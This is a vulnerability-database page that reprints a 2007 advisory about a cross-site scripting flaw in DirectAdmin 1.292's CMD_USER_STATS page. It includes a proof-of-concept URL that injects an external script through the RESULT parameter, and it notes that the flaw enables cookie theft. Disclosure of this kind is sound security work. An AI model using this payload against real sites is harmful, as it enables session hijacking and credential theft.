Lucene search

K

DirectAdmin 1.292 - CMD_USER_STATS Cross-Site Scripting

๐Ÿ—“๏ธย 16 Mar 2007ย 00:00:00Reported byย Mandr4keTypeย 
exploitpack
ย exploitpack
๐Ÿ‘ย 6ย Views

DirectAdmin 1.292 CMD_USER_STATS XSS Vulnerabilit

Show more
Code
source: https://www.securityfocus.com/bid/22996/info

DirectAdmin is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

http://www.example.com/CMD_USER_STATS?RESULT='http://example2.com/script.js'

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo